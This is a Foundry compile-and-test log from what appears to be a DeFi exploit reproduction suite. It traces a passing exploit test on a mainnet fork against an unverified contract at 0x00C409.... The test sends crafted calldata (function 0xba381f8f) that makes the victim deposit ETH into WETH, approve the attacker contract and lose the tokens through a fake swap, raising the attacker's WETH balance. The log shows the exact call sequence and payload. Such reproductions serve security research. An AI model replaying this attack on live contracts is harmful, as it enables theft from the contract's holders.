Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.20s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (3628): This contract has a payable fallback function, but no receive ether function. Consider adding a receive ether function.
  --> src/test/2024-04/UnverifiedContr_0x00C409_exp.sol:11:1:
   |
11 | contract ContractTest is Test {
   | ^ (Relevant source part starts here and spans across multiple lines).
Note: The payable fallback function is defined here.
  --> src/test/2024-04/UnverifiedContr_0x00C409_exp.sol:94:5:
   |
94 |     fallback() external payable {}
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Warning (9302): Return value of low-level calls not used.
  --> src/test/2024-04/UnverifiedContr_0x00C409_exp.sol:36:9:
   |
36 |         address(vulnContract).call{value: 4704.1 ether}("");
   |         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Warning (9302): Return value of low-level calls not used.
  --> src/test/2024-04/UnverifiedContr_0x00C409_exp.sol:51:9:
   |
51 |         vulnContract.call(data);
   |         ^^^^^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2024-04/UnverifiedContr_0x00C409_exp.sol:55:9:
   |
55 |         address token
   |         ^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2024-04/UnverifiedContr_0x00C409_exp.sol:69:9:
   |
69 |         uint256 amountIn,
   |         ^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2024-04/UnverifiedContr_0x00C409_exp.sol:70:9:
   |
70 |         uint256 reserveIn,
   |         ^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2024-04/UnverifiedContr_0x00C409_exp.sol:71:9:
   |
71 |         uint256 reserveOut,
   |         ^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2024-04/UnverifiedContr_0x00C409_exp.sol:72:9:
   |
72 |         uint256 a,
   |         ^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2024-04/UnverifiedContr_0x00C409_exp.sol:73:9:
   |
73 |         uint256 b,
   |         ^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2024-04/UnverifiedContr_0x00C409_exp.sol:74:9:
   |
74 |         uint256 c
   |         ^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2024-04/UnverifiedContr_0x00C409_exp.sol:80:9:
   |
80 |         address tokenIn,
   |         ^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2024-04/UnverifiedContr_0x00C409_exp.sol:82:9:
   |
82 |         address tokenOut,
   |         ^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2024-04/UnverifiedContr_0x00C409_exp.sol:83:9:
   |
83 |         uint256 minAmountOut,
   |         ^^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2024-04/UnverifiedContr_0x00C409_exp.sol:84:9:
   |
84 |         uint256 maxPrice
   |         ^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2024-04/UnverifiedContr_0x00C409_exp.sol:90:23:
   |
90 |     function transfer(address to, uint256 value) public returns (bool) {
   |                       ^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2024-04/UnverifiedContr_0x00C409_exp.sol:90:35:
   |
90 |     function transfer(address to, uint256 value) public returns (bool) {
   |                                   ^^^^^^^^^^^^^

Warning (2018): Function state mutability can be restricted to pure
  --> src/test/2024-04/UnverifiedContr_0x00C409_exp.sol:54:5:
   |
54 |     function getBalance(
   |     ^ (Relevant source part starts here and spans across multiple lines).

Warning (2018): Function state mutability can be restricted to pure
  --> src/test/2024-04/UnverifiedContr_0x00C409_exp.sol:90:5:
   |
90 |     function transfer(address to, uint256 value) public returns (bool) {
   |     ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 1.25s (1.99ms CPU time)

Ran 1 test for src/test/2024-04/UnverifiedContr_0x00C409_exp.sol:ContractTest
[PASS] testExploit() (gas: 328284)
Logs:
  [End] Attacker weth balance before exploit: 4704.100000000000000000
  [End] Attacker weth balance after exploit: 4722.366482869645213695

Traces:
  [3693] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 19255512 [1.925e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [415621] ContractTest::testExploit()
    ├─ [2534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::record()
    │   └─ ← [Return]
    ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::accesses(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2)
    │   └─ ← [Return] [0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c], []
    ├─ [0] VM::load(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ emit WARNING_UninitedSlot(who: 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, slot: 13407199363679635973052879518465057167389910613330280238043615909335847287356 [1.34e76])
    ├─ [0] VM::load(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::store(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c, 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff)
    │   └─ ← [Return]
    ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77]
    ├─ [0] VM::store(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c, 0x0000000000000000000000000000000000000000000000000000000000000000)
    │   └─ ← [Return]
    ├─ emit SlotFound(who: 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, fsig: 0x70a08231, keysHash: 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03, slot: 13407199363679635973052879518465057167389910613330280238043615909335847287356 [1.34e76])
    ├─ [0] VM::load(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ [0] VM::store(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c, 0x0000000000000000000000000000000000000000000000ff02806a9c2b0a0000)
    │   └─ ← [Return]
    ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 4704100000000000000000 [4.704e21]
    ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 4704100000000000000000 [4.704e21]
    ├─ [2444] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::decimals() [staticcall]
    │   └─ ← [Return] 18
    ├─ emit log_named_decimal_uint(key: "[End] Attacker weth balance before exploit", val: 4704100000000000000000 [4.704e21], decimals: 18)
    ├─ [9181] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::withdraw(4704100000000000000000 [4.704e21])
    │   ├─ [41] ContractTest::fallback{value: 4704100000000000000000}()
    │   │   └─ ← [Stop]
    │   ├─ emit Withdrawal(src: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], wad: 4704100000000000000000 [4.704e21])
    │   ├─  storage changes:
    │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x0000000000000000000000000000000000000000000000ff02806a9c2b0a0000 → 0
    │   └─ ← [Stop]
    ├─ [55] 0x00C409001C1900DdCdA20000008E112417DB003b::fallback{value: 4704100000000000000000}()
    │   └─ ← [Stop]
    ├─ emit log_data(data: 0xba381f8f0000000000000000000000000000000000000000000000ffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000010000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e14960000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e14960000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e14960000000000000000000000000000000000000000000000000000000000000001)
    ├─ [99366] 0x00C409001C1900DdCdA20000008E112417DB003b::ba381f8f(0000000000000000000000000000000000000000000000ffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000010000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e14960000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e14960000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e14960000000000000000000000000000000000000000000000000000000000000001)
    │   ├─ [751] ContractTest::getBalance(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2) [staticcall]
    │   │   └─ ← [Return] 1
    │   ├─ [751] ContractTest::getBalance(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   └─ ← [Return] 1
    │   ├─ [1484] ContractTest::calcOutGivenIn(1, 0, 1, 0, 4722366482869645213695 [4.722e21], 0)
    │   │   └─ ← [Return] 1
    │   ├─ [601] ContractTest::getReserves() [staticcall]
    │   │   └─ ← [Return] 1, 1, 1708269311 [1.708e9]
    │   ├─ [23974] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::deposit{value: 4722366482869645213695}()
    │   │   ├─ emit Deposit(dst: 0x00C409001C1900DdCdA20000008E112417DB003b, wad: 4722366482869645213695 [4.722e21])
    │   │   ├─  storage changes:
    │   │   │   @ 0x620263729d247d8b147374301b096e5bc2552bfc92aed0d4d3a47e82423e3cc8: 0 → 0x0000000000000000000000000000000000000000000000ffffffffffffffffff
    │   │   └─ ← [Stop]
    │   ├─ [24420] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::approve(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 4722366482869645213695 [4.722e21])
    │   │   ├─ emit Approval(owner: 0x00C409001C1900DdCdA20000008E112417DB003b, spender: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 4722366482869645213695 [4.722e21])
    │   │   ├─  storage changes:
    │   │   │   @ 0x36ee62b9b9a9ed5ec618c311bdb0ef02fb529dc505658c4c9e4996b9043c0f22: 0 → 0x0000000000000000000000000000000000000000000000ffffffffffffffffff
    │   │   └─ ← [Return] true
    │   ├─ [26771] ContractTest::swapExactAmountIn(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 4722366482869645213695 [4.722e21], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1, 452312848583266388373324160190187140051835877600158453279131187530910662656 [4.523e74])
    │   │   ├─ [24048] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transferFrom(0x00C409001C1900DdCdA20000008E112417DB003b, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 4722366482869645213695 [4.722e21])
    │   │   │   ├─ emit Transfer(from: 0x00C409001C1900DdCdA20000008E112417DB003b, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 4722366482869645213695 [4.722e21])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x36ee62b9b9a9ed5ec618c311bdb0ef02fb529dc505658c4c9e4996b9043c0f22: 0x0000000000000000000000000000000000000000000000ffffffffffffffffff → 0
    │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x0000000000000000000000000000000000000000000000ffffffffffffffffff
    │   │   │   │   @ 0x620263729d247d8b147374301b096e5bc2552bfc92aed0d4d3a47e82423e3cc8: 0x0000000000000000000000000000000000000000000000ffffffffffffffffff → 0
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Return] 0, 0
    │   ├─ [884] ContractTest::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1)
    │   │   └─ ← [Return] true
    │   ├─ [218] ContractTest::fallback(0, 0, 0x00C409001C1900DdCdA20000008E112417DB003b, 0x)
    │   │   └─ ← [Stop]
    │   ├─ [2495] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::withdraw(0)
    │   │   ├─ [55] 0x00C409001C1900DdCdA20000008E112417DB003b::fallback()
    │   │   │   └─ ← [Stop]
    │   │   ├─ emit Withdrawal(src: 0x00C409001C1900DdCdA20000008E112417DB003b, wad: 0)
    │   │   └─ ← [Stop]
    │   └─ ← [Stop]
    ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 4722366482869645213695 [4.722e21]
    ├─ [444] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::decimals() [staticcall]
    │   └─ ← [Return] 18
    ├─ emit log_named_decimal_uint(key: "[End] Attacker weth balance after exploit", val: 4722366482869645213695 [4.722e21], decimals: 18)
    ├─  storage changes:
    │   @ 0x6693fd66acae514ed2305cd0b7604a94266e750f2e1cc984901c9bc7c8726a5a: 0 → 1
    │   @ 0x6693fd66acae514ed2305cd0b7604a94266e750f2e1cc984901c9bc7c8726a57: 0 → 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c
    │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x0000000000000000000000000000000000000000000000ff02806a9c2b0a0000
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 4.94s (2.78s CPU time)

Ran 2 test suites in 6.68s (6.19s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
